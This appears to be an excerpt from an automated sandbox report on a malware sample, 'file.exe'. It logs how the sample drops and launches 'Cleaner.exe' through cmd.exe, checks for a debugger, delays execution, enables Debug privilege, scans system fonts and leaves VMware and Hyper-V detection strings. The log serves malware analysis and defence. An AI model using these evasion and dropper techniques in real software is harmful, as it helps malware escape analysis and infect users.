                Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\dll[1]Jump to dropped file
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 60000
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeFile Volume queried: C:\ FullSizeInformation
                Source: Amcache.hve.30.drBinary or memory string: VMware
                Source: Amcache.hve.30.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                Source: Amcache.hve.30.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                Source: Amcache.hve.30.drBinary or memory string: VMware Virtual USB Mouse
                Source: Cleaner.exe, 00000021.00000002.658091156.0000024B7E02C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[
                Source: Amcache.hve.30.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.30.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
                Source: file.exe, 00000000.00000000.308421884.0000000002EE0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW4
                Source: Amcache.hve.30.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.30.drBinary or memory string: VMware7,1
                Source: Amcache.hve.30.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.30.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: file.exe, 00000000.00000000.306966127.0000000002EE4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Amcache.hve.30.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Amcache.hve.30.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.30.drBinary or memory string: VMware, Inc.me
                Source: Amcache.hve.30.drBinary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
                Source: Amcache.hve.30.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                Source: Amcache.hve.30.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.30.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeMemory allocated: page read and write | page guard
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe
                Source: C:\Users\user\Desktop\file.exeProcess created: unknown unknown
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe"
                Source: file.exe, 00000000.00000000.261638552.000000000241E000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000000.306725027.000000000241E000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: file.exe, 00000000.00000000.261638552.000000000241E000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000000.306725027.000000000241E000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: F.program manager^
                Source: file.exe, 00000000.00000000.261638552.000000000241E000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000000.306725027.000000000241E000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: program manager
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Bunifu_UI_v1.5.3.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
